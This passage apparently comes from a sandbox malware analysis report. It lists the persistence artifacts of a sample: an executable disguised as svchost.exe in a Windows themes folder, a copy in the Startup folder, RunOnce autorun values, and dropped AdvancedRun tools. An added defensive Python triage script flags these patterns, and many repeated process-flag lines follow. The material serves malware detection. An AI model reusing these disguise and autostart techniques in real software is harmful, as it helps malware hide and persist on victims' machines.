                      Drops PE files with benign system names
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe File created: C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe File created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe File created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe

                      Boot Survival:

                      Drops PE files to the startup folder
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                      Creates autostart registry keys with suspicious names
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B
                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe\:Zone.Identifier:$DATA
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 481F404B
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Code function: 6_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
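                      The persistence artifacts in this section (a PE named svchost.exe written under C:\Windows\Resources\Themes instead of System32, a second copy in the user's Startup folder, and a RunOnce value named 481F404B) share two traits a triage script can key on: system-binary names outside the directories where those binaries live, and eight-hex-digit names for both the files and the registry value. The following Python is an added example and not code from the report or the sample: it classifies file-drop and autorun-value records against those traits. The sample records are constructed from the paths printed above, and the RunOnce value data is an assumption, since the report says the key points at a binary in C:\Windows but does not print the value.

```python
"""Classify dropped files and autorun registry values for the persistence
pattern shown above. Added example, not part of the Joe Sandbox report."""
import re
from pathlib import PureWindowsPath

# Names of Windows system processes that malware commonly borrows.
SYSTEM_BINARY_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
                       "explorer.exe", "conhost.exe", "dllhost.exe"}
# Where a file with such a name legitimately lives (prefix match, lower-case).
LEGIT_SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                     "c:\\windows\\winsxs\\", "c:\\windows\\explorer.exe")
STARTUP_DIR_MARKER = "\\microsoft\\windows\\start menu\\programs\\startup\\"
AUTORUN_KEYS = ("\\software\\microsoft\\windows\\currentversion\\run",
                "\\software\\microsoft\\windows\\currentversion\\runonce")
PE_EXTS = (".exe", ".dll", ".scr", ".com")
# Eight hex digits: the naming scheme of 481F404B.exe and the 4B6A7152 directory.
HEX8 = re.compile(r"[0-9A-F]{8}", re.IGNORECASE)


def classify_file_drop(path: str) -> list:
    """Tags for a file-creation record; an empty list means nothing notable."""
    p = PureWindowsPath(path)
    low = str(p).lower()
    name, ext = p.name.lower(), p.suffix.lower()
    tags = []
    if name in SYSTEM_BINARY_NAMES and not low.startswith(LEGIT_SYSTEM_DIRS):
        tags.append("system_name_outside_system_dir")
    if STARTUP_DIR_MARKER in low and ext in PE_EXTS:
        tags.append("pe_in_startup_folder")
    if low.startswith("c:\\windows\\") and not low.startswith(LEGIT_SYSTEM_DIRS) and ext in PE_EXTS:
        tags.append("pe_dropped_under_windows_dir")
    # Check the file stem and every directory component between drive and file.
    if HEX8.fullmatch(p.stem) or any(HEX8.fullmatch(part) for part in p.parts[1:-1]):
        tags.append("random_hex_name")
    return tags


def classify_autorun(key_path: str, value_name: str, value_data: str) -> list:
    """Tags for a registry value write under Run/RunOnce, including its target."""
    key = key_path.lower().rstrip("\\")
    if not key.endswith(AUTORUN_KEYS):
        return []
    tags = ["autorun_key"]
    if HEX8.fullmatch(value_name):
        tags.append("random_hex_value_name")
    # Value data is normally a quoted or bare image path, possibly with arguments.
    m = re.match(r'"([^"]+)"|(\S+)', value_data.strip())
    target = (m.group(1) or m.group(2)) if m else ""
    tags.extend("target:" + t for t in classify_file_drop(target))
    return tags


def triage(file_drops, autoruns):
    """Map each artifact to its tags; artifacts with no tags are omitted."""
    report = {}
    for path in file_drops:
        tags = classify_file_drop(path)
        if tags:
            report[path] = tags
    for key, name, data in autoruns:
        tags = classify_autorun(key, name, data)
        if tags:
            report[f"{key}\\{name}"] = tags
    return report


# Constructed records from the paths printed in this section, plus two controls.
SAMPLE_FILE_DROPS = [
    r"C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe",
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe",
    r"C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe",
    r"C:\Windows\System32\svchost.exe",  # control: the genuine service host
]
# Value data is an assumption: the report only states the key points into C:\Windows.
SAMPLE_AUTORUNS = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce", "481F404B",
     r'"C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe"'),
]

if __name__ == "__main__":
    for artifact, tags in triage(SAMPLE_FILE_DROPS, SAMPLE_AUTORUNS).items():
        print(artifact, "->", ", ".join(tags))
```

                      The AdvancedRun drop in %TEMP% gets no tags on purpose: it is a legitimately signed NirSoft utility and its location alone is not an indicator, whereas the same tool being launched by a process from the Startup folder is (covered by the process-tree rules earlier on the page). The hex-name heuristic is deliberately narrow (exactly eight hex digits) so that GUID-named temp directories and real Windows paths do not trip it.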
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exe Process information set: NOOPENFILEERRORBOX (48 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe Process information set: NOOPENFILEERRORBOX (9 occurrences)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
